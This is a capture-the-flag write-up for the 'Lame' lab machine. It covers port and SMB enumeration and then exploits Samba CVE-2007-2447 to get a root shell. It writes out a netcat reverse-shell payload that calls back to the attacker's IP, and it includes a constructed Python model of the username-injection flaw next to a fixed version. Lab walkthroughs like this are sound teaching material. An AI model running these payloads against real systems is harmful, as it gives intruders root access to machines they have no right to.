Ping Scan
ping 10.10.10.3
Ping worked, so the machine is reachable.
Nmap default
nmap 10.10.10.3 -oN dnmap

Nmap script scan
nmap 10.10.10.3 -sV -sC -oN snmap

Nmap SNMP Scan
nmap -sU -p 161 10.10.10.3
SNMP (161/udp) is filtered.

Nmap all port Scan
nmap 10.10.10.3 -p- -T5 --open -oN anmap
We can see a new open port, 3632.

Script and service scan for the new port
nmap -sV -sC -p3632 10.10.10.3 -oN 3632nmap

FTP Enumeration
ftp 10.10.10.3
We can log in as ftp or anonymous, but there are no files or directories inside the FTP session.

Smb Enumeration
smbmap -H 10.10.10.3
We can list shares without credentials.

smbclient -N //10.10.10.3/tmp
We can list the contents of the share "tmp".

Let's try to get an initial foothold on the machine using our findings.
First we will work with the SMB share we found to be readable and writable. We can see that a file "vgauthsvclog.txt.0" is present; we will get it and analyze it.
get vgauthsvclog.txt.0

cat vgauthsvclog.txt.0
Nothing useful.
Search for a public exploit
From the initial SMB enumeration we know the Samba version, so we will search for a public exploit for that version.
Yes, there is exploit code (CVE-2007-2447, command execution through Samba's "username map script"): https://github.com/Ziemni/CVE-2007-2447-in-Python/blob/master/smbExploit.py

OK, now we will use the exploit. I saved the exploit code in a file named 'exp.py' on my Kali machine and ran it; it printed its usage, and I ran it accordingly.
python3 exp.py 10.10.10.3 139 'nc -e /bin/sh 10.10.14.61 443'
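To see why a bare username can hand us a root shell, here is an added, constructed model of the CVE-2007-2447 bug. It is not the page's exp.py and not Samba's own source: the vulnerable Samba releases interpolated the unescaped SMB username into a shell command line when running the configured "username map script", so backticks inside the username are executed. The map script (/bin/echo), the subprocess-based stand-ins for Samba's behaviour, and the "touch a marker file" payload are all assumptions made for the demonstration; the username format is the one public exploits use.

```python
"""Constructed model of the CVE-2007-2447 username injection (added example).

vulnerable_map() mimics the flawed Samba behaviour: the username is pasted
into a string that /bin/sh -c parses.  fixed_map() shows the safe form, where
the username travels as its own argv entry and no shell ever sees it.
"""
import os
import subprocess
import tempfile

# Stand-in for the administrator-configured map script.  The exact script
# does not matter; the flaw is in how the username is appended to it.
MAP_SCRIPT = "/bin/echo"


def build_username(payload: str) -> str:
    """Return a username carrying a shell command, in the form public exploits use.

    The leading "/=" keeps the map-script syntax happy; the backticks do the
    work once the string reaches /bin/sh -c.  "nohup" keeps the payload alive
    after the SMB session that triggered it goes away.
    """
    return "/=`nohup " + payload + "`"


def vulnerable_map(username: str) -> str:
    """Flawed behaviour: username interpolated into a shell command string."""
    cmd = '%s "%s"' % (MAP_SCRIPT, username)  # backticks survive double quotes
    return subprocess.run(["/bin/sh", "-c", cmd],
                          capture_output=True, text=True).stdout


def fixed_map(username: str) -> str:
    """Hardened form: username passed as a separate argument, no shell parsing."""
    return subprocess.run([MAP_SCRIPT, username],
                          capture_output=True, text=True).stdout


def injection_executed(mapper) -> bool:
    """Feed an injected 'touch' through mapper; True if the marker file appeared."""
    marker = os.path.join(tempfile.mkdtemp(), "pwned")  # constructed target path
    mapper(build_username("touch " + marker))
    hit = os.path.exists(marker)
    if hit:
        os.remove(marker)
    os.rmdir(os.path.dirname(marker))
    return hit


if __name__ == "__main__":
    print("vulnerable path ran injected command:", injection_executed(vulnerable_map))
    print("fixed path ran injected command:     ", injection_executed(fixed_map))
```

The exploit run above does exactly this over the wire: the username in the SMB session setup is the string build_username() returns, with the nc reverse shell as the payload, and because smbd runs as root the resulting shell is root as well.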

Set up a netcat listener on 443 to catch the reverse shell
rlwrap nc -nlvp 443
Cool! We landed in a root shell, so no privilege escalation is needed on this machine.
Then I upgraded the shell. The machine has only an old Python, invoked as plain "python" (there is no "python3" or "python2" binary).
python -c 'import pty; pty.spawn("/bin/bash")'

Search for the flags in the root and home directories
find / -type f -name "root.txt" 2>/dev/null
find / -type f -name "user.txt" 2>/dev/null

We found the root flag in the root directory

and the user flag in /home/makis.

Done with Lame :)